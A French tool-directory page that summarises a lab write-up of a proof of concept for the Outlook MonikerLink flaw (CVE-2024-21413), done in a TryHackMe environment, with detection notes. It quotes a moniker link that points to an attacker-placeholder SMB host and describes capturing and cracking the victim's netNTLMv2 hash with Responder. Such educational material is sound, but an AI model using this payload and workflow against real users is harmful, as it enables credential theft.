Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC — Ce dépôt contient des notes de recherche et une preuve de concept (PoC) de haut niveau pour CVE-2024-21413, une vulnérabilité observée dans certains clients de messagerie lors du traitement des liens de type SMB/moniker intégrés dans les messages. Le PoC et les expériences documentés ici ont été réalisés dans un environnement de laboratoire contrôlé sur des systèmes. | Kitploit
Outils/GitHubGitHub/gurleen-147/cve-2024-21413-microsoft-outlook-remote-code-execution-vulnerability-poc
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubgurleen-147/cve-2024-21413-microsoft-outlook-remote-code-execution-vulnerability-poc

CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce dépôt contient des notes de recherche et une preuve de concept (PoC) de haut niveau pour CVE-2024-21413, une vulnérabilité observée dans certains clients de messagerie lors du traitement des liens de type SMB/moniker intégrés dans les messages. Le PoC et les expériences documentés ici ont été réalisés dans un environnement de laboratoire contrôlé sur des systèmes.

Voir le dépôt
23il y a 9 moisPas encore vérifié
Partager

💻 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

🧩 Aperçu

Ce projet reproduit le comportement MonikerLink (CVE-2024-21413) dans un environnement TryHackMe entièrement isolé afin de montrer comment certains formats de liens hypertexte peuvent amener Outlook à traiter un lien d'une manière qui divulgue des tentatives d'authentification ou mène à une exploitation plus poussée. Le livrable est une PoC, ainsi qu'un ensemble priorisé de mesures d'atténuation et de suggestions de détection que les équipes de sécurité peuvent appliquer. Aucun système en production / non autorisé n'a été ciblé.


⚙️ Outils et technologies

Outil / CompétenceObjectif
PythonDéveloppement de scripts
Linux (Kali)Système cible
MetasploitExploitation et accès
TryHackMe LabEnvironnement contrôlé

🚀 Configuration et exécution

  • J'ai ouvert un terminal sous Linux sur la machine attaquante
    • J'ai créé un fichier python et collé le code exploit.py

      Ce code a été écrit par CMNatic et peut être trouvé ici

    • J'ai modifié le code pour l'adapter à l'environnement de ma machine.

      Par exemple, dans la ligne suivante “<a href=“file://ATTACKER_MACHINE/test!” j'ai remplacé "ATTACKER_MACHINE" par l'adresse IP de ma machine attaquante, et dans la ligne “server = smtplib.SMTP('MAILSERVER', 25)”, j'ai changé "MAILSERVER" par l'adresse IP de ma machine victime.

    • Puis j'ai exécuté le fichier exploit.py et j'ai obtenu la réponse indiquant « l'e-mail a été envoyé »
    • Pour capturer le netNTLMv2 (ce hash peut être déchiffré avec John the Ripper ou d'autres outils et les mots de passe en clair peuvent être récupérés). J'ai donc utilisé un outil appelé responder pour capturer la réponse de la machine victime. La commande pour exécuter responder était :

      responder -I ens5

      • Ici, -I signifie interface et j'ai utilisé l'interface ens5. Dans mon cas, la commande affichait une erreur ; pour la résoudre, j'ai d'abord utilisé la commande suivante, puis réessayé la commande ci-dessus, et cela a fonctionné.

        systemctl start systemd-resolved

  • Ensuite, je me suis connecté à ma machine victime
    • J'ai ouvert Outlook et ouvert le lien contenu dans l'e-mail que j'ai envoyé depuis la machine attaquante
  • Ainsi, en un seul clic sur le lien, le responder sur ma machine attaquante a pu capturer le hash netNTLMv2 hash netNTLMv2

Cette preuve de concept expose une nuance dans la gestion des liens de Microsoft Outlook : certains liens moniker de type file:// qui référencent des ressources SMB peuvent contourner le filtrage standard d'Outlook et provoquer des tentatives d'authentification sortantes. Le comportement démontré ici a été reproduit dans un laboratoire TryHackMe entièrement contrôlé et met en évidence comment des formats de liens apparemment bénins peuvent masquer des interactions réseau. Bien que des correctifs du fournisseur et des recommandations de détection aient été publiés, la mécanique sous-jacente reste complexe en raison des utilisations légitimes du schéma moniker/file. Il est important de noter que l'activité générée par cette PoC est observable au niveau du réseau (par exemple, dans les captures de paquets montrant des tentatives d'authentification NTLM), ce qui la rend propice à l'analyse forensique et à l'investigation d'incidents.

Détection

Une règle Yara a été créée par Florian Roth pour détecter les e-mails contenant l'élément :file:\:. Image Wireshark

Télécharger l’outil